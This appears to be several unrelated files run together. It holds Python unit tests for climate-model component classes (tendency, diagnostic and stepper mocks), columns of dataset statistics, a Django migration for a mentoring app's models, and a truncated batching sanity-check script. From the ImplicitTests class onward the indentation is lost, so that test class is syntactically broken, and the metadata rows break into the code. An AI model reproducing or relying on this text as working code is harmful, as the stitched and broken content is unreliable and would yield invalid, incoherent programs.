            'output1': np.ones([10]) * 20.,
        }
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output, tendencies_in_diagnostics=True,
        )
        tendency_name = 'output1_tendency_from_{}'.format(prognostic.__class__.__name__)
        assert len(prognostic.diagnostic_properties) == 1
        assert tendency_name in prognostic.diagnostic_properties.keys()
        properties = prognostic.diagnostic_properties[tendency_name]
        assert properties['dims'] == ['dim1']
        assert properties['units'] == 'm/s'
        state = {
            'time': timedelta(0),
            'output1': DataArray(
                np.ones([10]),
                dims=['dim1'],
                attrs={'units': 'm'}),
        }
        _, diagnostics = self.call_component(prognostic, state)
        assert tendency_name in diagnostics.keys()
        assert len(
            diagnostics[tendency_name].dims) == 1
        assert 'dim1' in diagnostics[tendency_name].dims
        assert diagnostics[tendency_name].attrs['units'] == 'm/s'
        assert np.all(diagnostics[tendency_name].values == 20.)

    def test_tendencies_in_diagnostics_one_tendency_with_component_name(self):
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm/s'
            }
        }
        diagnostic_output = {}
        tendency_output = {
            'output1': np.ones([10]) * 20.,
        }
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output, tendencies_in_diagnostics=True,
            name='component',
        )
        # an explicit name overrides the class name in the diagnostic key
        tendency_name = 'output1_tendency_from_component'
        assert len(prognostic.diagnostic_properties) == 1
        assert tendency_name in prognostic.diagnostic_properties.keys()
        properties = prognostic.diagnostic_properties[tendency_name]
        assert properties['dims'] == ['dim1']
        assert properties['units'] == 'm/s'
        state = {
            'time': timedelta(0),
        }
        _, diagnostics = self.call_component(prognostic, state)
        assert tendency_name in diagnostics.keys()
        assert len(
            diagnostics[tendency_name].dims) == 1
        assert 'dim1' in diagnostics[tendency_name].dims
        assert diagnostics[tendency_name].attrs['units'] == 'm/s'
        assert np.all(diagnostics[tendency_name].values == 20.)
class ImplicitPrognosticTests(PrognosticTests):
    """Runs the PrognosticTests suite against MockImplicitTendencyComponent.

    Overrides the helper methods so the component is called with a timestep,
    and adds checks specific to ImplicitTendencyComponent.
    """

    component_class = MockImplicitTendencyComponent

    def call_component(self, component, state):
        # ImplicitTendencyComponent requires a timestep in addition to state
        return component(state, timedelta(seconds=1))

    def get_component(
            self, input_properties=None, tendency_properties=None,
            diagnostic_properties=None, tendency_output=None,
            diagnostic_output=None):
        """Construct a MockImplicitTendencyComponent with empty defaults."""
        return MockImplicitTendencyComponent(
            input_properties=input_properties or {},
            tendency_properties=tendency_properties or {},
            diagnostic_properties=diagnostic_properties or {},
            tendency_output=tendency_output or {},
            diagnostic_output=diagnostic_output or {},
        )

    def test_cannot_use_bad_component(self):
        component = BadMockImplicitTendencyComponent()
        with self.assertRaises(RuntimeError):
            self.call_component(component, {'time': timedelta(0)})

    def test_subclass_check(self):
        # duck-typed class registers as an ImplicitTendencyComponent instance
        class MyImplicitPrognostic(object):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def __call__(self, state, timestep):
                pass

            def array_call(self, state, timestep):
                pass

        instance = MyImplicitPrognostic()
        assert isinstance(instance, ImplicitTendencyComponent)

    def test_two_components_are_not_instances_of_each_other(self):
        class MyImplicitTendencyComponent1(ImplicitTendencyComponent):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def array_call(self, state, timestep):
                pass

        class MyImplicitTendencyComponent2(ImplicitTendencyComponent):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            # NOTE(review): omits the timestep argument taken by its sibling
            # above — presumably irrelevant since this class is never called,
            # only isinstance-checked; confirm intentional
            def array_call(self, state):
                pass

        prog1 = MyImplicitTendencyComponent1()
        prog2 = MyImplicitTendencyComponent2()
        assert not isinstance(prog1, MyImplicitTendencyComponent2)
        assert not isinstance(prog2, MyImplicitTendencyComponent1)

    def test_ducktype_not_instance_of_subclass(self):
        class MyImplicitPrognostic1(object):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def __init__(self):
                pass

            def array_call(self, state, timestep):
                pass

        class MyImplicitTendencyComponent2(ImplicitTendencyComponent):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def array_call(self, state):
                pass

        prog1 = MyImplicitPrognostic1()
        assert not isinstance(prog1, MyImplicitTendencyComponent2)

    def test_subclass_is_not_prognostic(self):
        # an ImplicitTendencyComponent subclass is not a TendencyComponent
        class MyImplicitTendencyComponent(ImplicitTendencyComponent):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def array_call(self, state, timestep):
                pass

        instance = MyImplicitTendencyComponent()
        assert not isinstance(instance, TendencyComponent)

    def test_ducktype_is_not_prognostic(self):
        # the two-argument call signature marks it as implicit, not prognostic
        class MyImplicitPrognostic(object):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def __call__(self, state, timestep):
                pass

            def array_call(self, state, timestep):
                pass

        instance = MyImplicitPrognostic()
        assert not isinstance(instance, TendencyComponent)

    def test_timedelta_is_passed(self):
        # the timestep given to __call__ must reach the component unchanged
        prognostic = MockImplicitTendencyComponent({}, {}, {}, {}, {})
        tendencies, diagnostics = prognostic(
            {'time': timedelta(seconds=0)}, timedelta(seconds=5))
        assert tendencies == {}
        assert diagnostics == {}
        assert prognostic.timestep_given == timedelta(seconds=5)
        assert prognostic.times_called == 1
class DiagnosticTests(unittest.TestCase, InputTestBase, DiagnosticTestBase):
    """Tests for DiagnosticComponent behavior, using MockDiagnosticComponent."""

    component_class = MockDiagnosticComponent

    def call_component(self, component, state):
        # DiagnosticComponent takes only a state; returns diagnostics directly
        return component(state)

    def get_component(
            self, input_properties=None,
            diagnostic_properties=None,
            diagnostic_output=None):
        """Construct a MockDiagnosticComponent with empty defaults."""
        return MockDiagnosticComponent(
            input_properties=input_properties or {},
            diagnostic_properties=diagnostic_properties or {},
            diagnostic_output=diagnostic_output or {},
        )

    def get_diagnostics(self, result):
        # the call result IS the diagnostics dict for this component type
        return result

    def test_cannot_use_bad_component(self):
        component = BadMockDiagnosticComponent()
        with self.assertRaises(RuntimeError):
            self.call_component(component, {'time': timedelta(0)})

    def test_subclass_check(self):
        # duck-typed class registers as a DiagnosticComponent instance
        class MyDiagnostic(object):
            input_properties = {}
            diagnostic_properties = {}

            def __call__(self, state):
                pass

            def array_call(self, state):
                pass

        instance = MyDiagnostic()
        assert isinstance(instance, DiagnosticComponent)

    def test_two_components_are_not_instances_of_each_other(self):
        class MyDiagnosticComponent1(DiagnosticComponent):
            input_properties = {}
            diagnostic_properties = {}

            def array_call(self, state):
                pass

        class MyDiagnosticComponent2(DiagnosticComponent):
            input_properties = {}
            diagnostic_properties = {}

            def array_call(self, state):
                pass

        diag1 = MyDiagnosticComponent1()
        diag2 = MyDiagnosticComponent2()
        assert not isinstance(diag1, MyDiagnosticComponent2)
        assert not isinstance(diag2, MyDiagnosticComponent1)

    def test_ducktype_not_instance_of_subclass(self):
        class MyDiagnostic1(object):
            input_properties = {}
            diagnostic_properties = {}

            def __init__(self):
                pass

            def array_call(self, state):
                pass

        class MyDiagnosticComponent2(DiagnosticComponent):
            input_properties = {}
            diagnostic_properties = {}

            def array_call(self, state):
                pass

        diag1 = MyDiagnostic1()
        assert not isinstance(diag1, MyDiagnosticComponent2)

    def test_empty_diagnostic(self):
        diagnostic = self.component_class({}, {}, {})
        diagnostics = diagnostic({'time': timedelta(seconds=0)})
        assert diagnostics == {}
        assert len(diagnostic.state_given) == 1
        assert 'time' in diagnostic.state_given.keys()
        assert diagnostic.state_given['time'] == timedelta(seconds=0)
        assert diagnostic.times_called == 1
class ImplicitTests(unittest.TestCase, InputTestBase, DiagnosticTestBase):
component_class = MockStepper
def call_component(self, component, state):
    """Invoke the Stepper-style component with a fixed 1-second timestep."""
    return component(state, timedelta(seconds=1))
def get_component(
        self, input_properties=None, output_properties=None,
        diagnostic_properties=None, state_output=None,
        diagnostic_output=None):
    """Construct a MockStepper, defaulting each property/output dict to empty."""
    return MockStepper(
        input_properties=input_properties or {},
        output_properties=output_properties or {},
        diagnostic_properties=diagnostic_properties or {},
        state_output=state_output or {},
        diagnostic_output=diagnostic_output or {},
    )
def get_diagnostics(self, result):
    # diagnostics are the first element of the Stepper call result
    # (the second element is presumably the new state — confirm against
    # MockStepper's return convention)
    return result[0]
def test_raises_on_output_properties_of_wrong_type(self):
    # output_properties must be a dict, not a tuple of dicts
    with self.assertRaises(InvalidPropertyDictError):
        self.get_component(output_properties=({},))
def test_cannot_use_bad_component(self):
    # BadMockStepper is expected to fail with RuntimeError when called
    component = BadMockStepper()
    with self.assertRaises(RuntimeError):
        self.call_component(component, {'time': timedelta(0)})
def test_subclass_check(self):
    # a duck-typed class with the right attributes and methods counts as
    # a Stepper instance without inheriting from it
    class MyImplicit(object):
        input_properties = {}
        diagnostic_properties = {}
        output_properties = {}
        tendencies_in_diagnostics = False
        name = ''

        def __call__(self, state, timestep):
            pass

        def array_call(self, state, timestep):
            pass

    instance = MyImplicit()
    assert isinstance(instance, Stepper)
def test_output_raises_when_units_incompatible_with_input(self):
    # 'km' (length) and 'degK' (temperature) cannot describe one quantity
    input_properties = {
        'input1': {'units': 'km', 'dims': ['dim1', 'dim2']}
    }
    output_properties = {
        'input1': {'units': 'degK', 'dims': ['dim1', 'dim2']}
    }
    with self.assertRaises(InvalidPropertyDictError):
        self.get_component(
            input_properties=input_properties,
            output_properties=output_properties,
        )
def test_two_components_are_not_instances_of_each_other(self):
    # sibling Stepper subclasses must not satisfy each other's isinstance
    class MyStepper1(Stepper):
        input_properties = {}
        diagnostic_properties = {}
        output_properties = {}
        tendencies_in_diagnostics = False
        name = ''

        def array_call(self, state):
            pass

    class MyStepper2(Stepper):
        input_properties = {}
        diagnostic_properties = {}
        output_properties = {}
        tendencies_in_diagnostics = False
        name = ''

        def array_call(self, state):
            pass

    implicit1 = MyStepper1()
    implicit2 = MyStepper2()
    assert not isinstance(implicit1, MyStepper2)
    assert not isinstance(implicit2, MyStepper1)
def test_ducktype_not_instance_of_subclass(self):
    # duck typing makes an object a Stepper, but never an instance of a
    # concrete user-defined Stepper subclass
    class MyImplicit1(object):
        input_properties = {}
        diagnostic_properties = {}
        output_properties = {}
        tendencies_in_diagnostics = False
        name = ''

        def __init__(self):
            pass

        def array_call(self, state):
            pass

    class MyStepper2(Stepper):
        input_properties = {}
        diagnostic_properties = {}
        output_properties = {}
        tendencies_in_diagnostics = False
        name = ''

        def array_call(self, state):
            pass

    implicit1 = MyImplicit1()
    assert not isinstance(implicit1, MyStepper2)
def test_empty_implicit(self):
implicit = self.component_class(
{}, {}, {}, {}, {})
tendencies, diagnostics = self.call_component(
implicit, {'time': timedelta(seconds=0)})
assert tendencies == {}
assert diagnostics == {}
assert len(implicit.state_given) == 1
assert 'time' in implicit.state_given.keys()
assert implicit.state_given['time'] == timedelta(seconds=0)
assert implicit.times_called == 1
def test_output_requires_dims(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {'diag1': {'units': 'm'}}
diagnostic_output = {}
state_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, state_output
)
def test_output_uses_base_dims(self):
input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
diagnostic_properties = {}
output_properties = {'diag1': {'units': 'm'}}
diagnostic_output = {}
state_output = {}
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, state_output
)
def test_output_doesnt_use_base_units(self):
input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
diagnostic_properties = {}
output_properties = {'diag1': {'dims': ['dim1']}}
diagnostic_output = {}
state_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, state_output
)
def test_output_requires_units(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {'output1': {'dims': ['dim1']}}
diagnostic_output = {}
state_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, state_output
)
def test_cannot_overlap_output_aliases(self):
input_properties = {
}
diagnostic_properties = {
}
output_properties = {
'out1': {'dims': ['dim1'], 'units': 'm', 'alias': 'out'},
'out2': {'dims': ['dim1'], 'units': 'm', 'alias': 'out'}
}
diagnostic_output = {}
output_state = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, output_state
)
def test_timedelta_is_passed(self):
implicit = MockStepper({}, {}, {}, {}, {})
tendencies, diagnostics = implicit(
{'time': timedelta(seconds=0)}, timedelta(seconds=5))
assert tendencies == {}
assert diagnostics == {}
assert implicit.timestep_given == timedelta(seconds=5)
assert implicit.times_called == 1
def test_raises_when_output_not_given(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dims1'],
'units': 'm',
}
}
diagnostic_output = {}
state_output = {}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, state_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentMissingOutputError):
_, _ = self.call_component(implicit, state)
def test_raises_when_extraneous_output_given(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
diagnostic_output = {}
state_output = {
'tend1': np.zeros([10]),
}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, state_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentExtraOutputError):
_, _ = self.call_component(implicit, state)
def test_output_no_transformations(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm/s'
}}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]),
}
prognostic = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state
)
state = {'time': timedelta(0)}
_, output = self.call_component(prognostic, state)
assert len(output) == 1
assert 'output1' in output.keys()
assert isinstance(output['output1'], DataArray)
assert len(output['output1'].dims) == 1
assert 'dim1' in output['output1'].dims
assert 'units' in output['output1'].attrs
assert output['output1'].attrs['units'] == 'm/s'
assert np.all(output['output1'].values == np.ones([10]))
def test_output_with_alias(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm/s',
'alias': 'out1',
}}
diagnostic_output = {}
output_state = {
'out1': np.ones([10]),
}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state
)
state = {'time': timedelta(0)}
_, output = self.call_component(implicit, state)
assert len(output) == 1
assert 'output1' in output.keys()
assert isinstance(output['output1'], DataArray)
assert len(output['output1'].dims) == 1
assert 'dim1' in output['output1'].dims
assert 'units' in output['output1'].attrs
assert output['output1'].attrs['units'] == 'm/s'
assert np.all(output['output1'].values == np.ones([10]))
def test_output_with_alias_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
'alias': 'out1',
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_output = {}
output_state = {
'out1': np.ones([10]),
}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state
)
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
_, output = self.call_component(implicit, state)
assert len(output) == 1
assert 'output1' in output.keys()
assert isinstance(output['output1'], DataArray)
assert len(output['output1'].dims) == 1
assert 'dim1' in output['output1'].dims
assert 'units' in output['output1'].attrs
assert output['output1'].attrs['units'] == 'm'
assert np.all(output['output1'].values == np.ones([10]))
def test_output_with_dims_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'units': 'm',
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]),
}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state
)
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
_, output = self.call_component(implicit, state)
assert len(output) == 1
assert 'output1' in output.keys()
assert isinstance(output['output1'], DataArray)
assert len(output['output1'].dims) == 1
assert 'dim1' in output['output1'].dims
assert 'units' in output['output1'].attrs
assert output['output1'].attrs['units'] == 'm'
assert np.all(output['output1'].values == np.ones([10]))
def test_tendencies_in_diagnostics_no_tendency(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
diagnostic_output = {}
output_state = {}
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True
)
assert implicit.input_properties == {}
assert implicit.diagnostic_properties == {}
assert implicit.output_properties == {}
state = {'time': timedelta(0)}
diagnostics, _ = implicit(state, timedelta(seconds=5))
assert diagnostics == {}
def test_tendencies_in_diagnostics_one_tendency(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 20.,
}
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
)
assert len(implicit.diagnostic_properties) == 1
assert 'output1_tendency_from_MockStepper' in implicit.diagnostic_properties.keys()
assert 'output1' in input_properties.keys(), 'Stepper needs original value to calculate tendency'
assert input_properties['output1']['dims'] == ['dim1']
assert input_properties['output1']['units'] == 'm'
properties = implicit.diagnostic_properties[
'output1_tendency_from_MockStepper']
assert properties['dims'] == ['dim1']
assert properties['units'] == 'm s^-1'
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10])*10.,
dims=['dim1'],
attrs={'units': 'm'}
),
}
diagnostics, _ = implicit(state, timedelta(seconds=5))
assert 'output1_tendency_from_MockStepper' in diagnostics.keys()
assert len(
diagnostics['output1_tendency_from_MockStepper'].dims) == 1
assert 'dim1' in diagnostics['output1_tendency_from_MockStepper'].dims
assert diagnostics['output1_tendency_from_MockStepper'].attrs['units'] == 'm s^-1'
assert np.all(
diagnostics['output1_tendency_from_MockStepper'].values == 2.)
def test_tendencies_in_diagnostics_one_tendency_dims_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 20.,
}
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
)
assert len(implicit.diagnostic_properties) == 1
assert 'output1_tendency_from_MockStepper' in implicit.diagnostic_properties.keys()
assert 'output1' in input_properties.keys(), 'Stepper needs original value to calculate tendency'
assert input_properties['output1']['dims'] == ['dim1']
assert input_properties['output1']['units'] == 'm'
properties = implicit.diagnostic_properties[
'output1_tendency_from_MockStepper']
assert properties['dims'] == ['dim1']
assert properties['units'] == 'm s^-1'
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10])*10.,
dims=['dim1'],
attrs={'units': 'm'}
),
}
diagnostics, _ = implicit(state, timedelta(seconds=5))
assert 'output1_tendency_from_MockStepper' in diagnostics.keys()
assert len(
diagnostics['output1_tendency_from_MockStepper'].dims) == 1
assert 'dim1' in diagnostics['output1_tendency_from_MockStepper'].dims
assert diagnostics['output1_tendency_from_MockStepper'].attrs['units'] == 'm s^-1'
assert np.all(
diagnostics['output1_tendency_from_MockStepper'].values == 2.)
def test_tendencies_in_diagnostics_one_tendency_mismatched_units(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'km'
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 20.,
}
with self.assertRaises(InvalidPropertyDictError):
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
)
def test_tendencies_in_diagnostics_one_tendency_mismatched_dims(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm'
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim2'],
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 20.,
}
with self.assertRaises(InvalidPropertyDictError):
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
)
def test_tendencies_in_diagnostics_one_tendency_with_component_name(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 7.,
}
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
name='component'
)
assert len(implicit.diagnostic_properties) == 1
assert 'output1_tendency_from_component' in implicit.diagnostic_properties.keys()
properties = implicit.diagnostic_properties[
'output1_tendency_from_component']
assert properties['dims'] == ['dim1']
assert properties['units'] == 'm s^-1'
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]) * 2.,
dims=['dim1'],
attrs={'units': 'm'}
),
}
diagnostics, _ = implicit(state, timedelta(seconds=5))
assert 'output1_tendency_from_component' in diagnostics.keys()
assert len(diagnostics['output1_tendency_from_component'].dims) == 1
assert 'dim1' in diagnostics['output1_tendency_from_component'].dims
assert diagnostics['output1_tendency_from_component'].attrs['units'] == 'm s^-1'
assert np.all(diagnostics['output1_tendency_from_component'].values == 1.)
if __name__ == '__main__':
pytest.main([__file__])
| 35.437953
| 105
| 0.57276
| 6,384
| 73,392
| 6.320175
| 0.033991
| 0.077327
| 0.08848
| 0.082408
| 0.906265
| 0.878581
| 0.855259
| 0.822668
| 0.806261
| 0.780906
| 0
| 0.016395
| 0.317691
| 73,392
| 2,070
| 106
| 35.455072
| 0.78934
| 0
| 0
| 0.73746
| 0
| 0
| 0.065743
| 0.010328
| 0
| 0
| 0
| 0
| 0.155816
| 1
| 0.081644
| false
| 0.019744
| 0.002668
| 0.009072
| 0.129136
| 0.000534
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
faedad2800d870e0d4fec1ef78ef72316567e49f
| 6,591
|
py
|
Python
|
mentoring/migrations/0001_initial.py
|
TomWerner/AlumniMentoring
|
d4bac09fc768232f0795a0672eb041a2225118ae
|
[
"MIT"
] | 2
|
2016-10-19T17:04:53.000Z
|
2017-07-23T21:49:34.000Z
|
mentoring/migrations/0001_initial.py
|
TomWerner/AlumniMentoring
|
d4bac09fc768232f0795a0672eb041a2225118ae
|
[
"MIT"
] | null | null | null |
mentoring/migrations/0001_initial.py
|
TomWerner/AlumniMentoring
|
d4bac09fc768232f0795a0672eb041a2225118ae
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-10-16 23:14
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Mentee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.TextField(max_length=50)),
('last_name', models.TextField(max_length=50)),
('gender', models.TextField(choices=[('m', 'Male'), ('f', 'Female')], max_length=1)),
('active', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='MenteeContactInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('primary_phone', models.CharField(max_length=20)),
('secondary_phone', models.CharField(max_length=20)),
('primary_email', models.EmailField(max_length=254)),
('secondary_email', models.EmailField(max_length=254)),
('linkedin_url', models.CharField(max_length=100)),
('facebook_url', models.CharField(max_length=100)),
('personal_url', models.CharField(max_length=100)),
('street_address', models.CharField(max_length=100)),
('city', models.CharField(max_length=100)),
('state', models.CharField(max_length=30)),
('mentee', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentee')),
],
),
migrations.CreateModel(
name='MenteeEducation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('school', models.CharField(max_length=100)),
('major1', models.CharField(max_length=100)),
('major2', models.CharField(blank=True, max_length=100, null=True)),
('minor1', models.CharField(blank=True, max_length=100, null=True)),
('minor2', models.CharField(blank=True, max_length=100, null=True)),
('degree', models.CharField(choices=[('ba', 'Bachelor of Arts'), ('bs', 'Bachelor of Sciences'), ('m', 'Masters'), ('d', 'Ph.D'), ('pd', 'MD Ph.D'), ('md', 'MD')], max_length=3)),
('graduation_year', models.DateField()),
],
),
migrations.CreateModel(
name='Mentor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('gender', models.CharField(choices=[('m', 'Male'), ('f', 'Female')], max_length=1)),
('active', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='MentorContactInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('primary_phone', models.CharField(max_length=20)),
('secondary_phone', models.CharField(max_length=20)),
('primary_email', models.EmailField(max_length=254)),
('secondary_email', models.EmailField(max_length=254)),
('linkedin_url', models.CharField(max_length=100)),
('facebook_url', models.CharField(max_length=100)),
('personal_url', models.CharField(max_length=100)),
('street_address', models.TextField(max_length=100)),
('city', models.TextField(max_length=100)),
('state', models.TextField(max_length=30)),
('mentor', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor')),
],
),
migrations.CreateModel(
name='MentorEducation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('school', models.CharField(max_length=100)),
('major1', models.CharField(max_length=100)),
('major2', models.CharField(blank=True, max_length=100, null=True)),
('minor1', models.CharField(blank=True, max_length=100, null=True)),
('minor2', models.CharField(blank=True, max_length=100, null=True)),
('degree', models.CharField(choices=[('ba', 'Bachelor of Arts'), ('bs', 'Bachelor of Sciences'), ('m', 'Masters'), ('d', 'Ph.D'), ('pd', 'MD Ph.D'), ('md', 'MD')], max_length=3)),
('graduation_year', models.DateField()),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor')),
],
),
migrations.CreateModel(
name='MentorEmployment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.CharField(max_length=100)),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor')),
],
),
migrations.CreateModel(
name='MentorMenteePairs',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_date', models.DateField()),
('end_date', models.DateField(null=True)),
('comments', models.TextField()),
('mentee', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentee')),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor')),
],
),
migrations.AddField(
model_name='menteeeducation',
name='mentor',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor'),
),
]
| 52.728
| 195
| 0.570475
| 656
| 6,591
| 5.577744
| 0.182927
| 0.098388
| 0.072151
| 0.137743
| 0.825635
| 0.769882
| 0.740366
| 0.740366
| 0.740366
| 0.740366
| 0
| 0.025966
| 0.26961
| 6,591
| 124
| 196
| 53.153226
| 0.734109
| 0.009862
| 0
| 0.637931
| 1
| 0
| 0.141499
| 0.007359
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025862
| 0
| 0.060345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87bdfe99811f7b922cbd2e9331deb56c2b325dc5
| 1,276
|
py
|
Python
|
batcher_sanity_check.py
|
JRC1995/SocialMediaNER
|
236b22ded48f64516ebf0577c3b9d9d907db84e0
|
[
"MIT"
] | null | null | null |
batcher_sanity_check.py
|
JRC1995/SocialMediaNER
|
236b22ded48f64516ebf0577c3b9d9d907db84e0
|
[
"MIT"
] | null | null | null |
batcher_sanity_check.py
|
JRC1995/SocialMediaNER
|
236b22ded48f64516ebf0577c3b9d9d907db84e0
|
[
"MIT"
] | null | null | null |
from dataLoader.batch import batcher
type1_samples = [[10, 11, 12], [10], [10, 11, 12, 13], [10, 11]]
type2_samples = [[20, 21, 22], [20], [20, 21, 22, 23], [20, 21]]
type3_samples = [3, 1, 4, 2]
sample_tuples = [type1_samples, type2_samples, type3_samples]
pad_types = [0, -1, None]
i = 0
for batch, batch_masks in batcher(sample_tuples, pad_types, batch_size=2):
type1_batch = batch[0]
type2_batch = batch[1]
type3_batch = batch[2]
type1_mask = batch_masks[0]
type2_mask = batch_masks[0]
print("type1", type1_batch)
